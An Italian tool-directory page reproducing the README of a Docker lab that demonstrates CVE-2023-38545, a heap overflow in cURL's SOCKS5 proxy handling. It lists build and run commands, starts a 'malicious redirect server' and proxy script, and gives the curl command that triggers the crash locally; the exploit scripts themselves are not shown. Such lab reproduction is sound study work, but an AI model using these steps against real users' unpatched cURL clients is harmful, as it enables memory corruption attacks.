Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-38545-sample — Dockerfile contenente tutti i file di configurazione necessari per dimostrare l'exploit | Kitploit
Strumenti/GitHubGitHub/vanigori/cve-2023-38545-sample
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSicurezza WebApprendimento e FormazioneLab e Pratica
GitHubvanigori/cve-2023-38545-sample

CVE-2023-38545-sample

Dockerfile contenente tutti i file di configurazione necessari per dimostrare l'exploit

Vedi Repository
322 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Breve descrizione

Questo progetto mostra la CVE-2023-38545 di cURL. L'ho reso il più leggero possibile.

Configurazione

Prima, crea l'immagine Docker:

docker build . -t cveimage

Successivamente, possiamo semplicemente eseguire il file immagine, creando un container Docker temporaneo che verrà eliminato una volta che il container viene arrestato:

docker run --rm --tty --net="host" --name cvecontainer cveimage

Se hai difficoltà a digitare comandi, apri semplicemente un altro terminale ed esegui:

docker exec -it cvecontainer /bin/bash

Ora dobbiamo avviare tutti i servizi. Connettiti al container già in esecuzione ed esegui:

./exploit/malicious_redirect_server.sh &

python3 /exploit/proxy.py &

Ora, dall'interno del container puoi vedere l'exploit di cURL in azione:

curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000

Devi vedere un errore di segmentazione sulla macchina che ha eseguito il comando curl per sapere che l'exploit è riuscito. Se non lo vedi, o l'exploit non si è verificato, oppure il processo aveva così tanto spazio heap disponibile che non hai sovrascritto memoria inaccessibile.

Altro lavoro (PR benvenuti)

  • Rendi questo README più carino
  • Configura systemd per avviare automaticamente il codice dell'exploit
  • Riduci il tempo di build e le dimensioni dell'immagine Docker
  • Qualsiasi cosa/tutto il resto. . .?

Riferimenti

  • Il proxy socks5 non è autoprodotto. Il codice originale del proxy si trova qui: https://github.com/alexbers/tgsocksproxy
    • Originariamente sfruttato in ubuntu (wsl) con supporto systemd: https://github.com/aire1/mtproxy_autoinstaller
  • Il report di HackerOne, che ha risparmiato un sacco di tempo di ricerca. Leggilo se vuoi capire come avviene questo exploit: https://hackerone.com/reports/2187833
Scarica lo strumento